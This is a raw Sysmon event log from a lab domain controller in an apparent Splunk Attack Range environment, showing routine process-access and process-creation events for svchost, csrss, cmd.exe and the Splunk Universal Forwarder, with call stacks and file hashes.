13:36:38.030{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.045{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
10341000x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.939{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 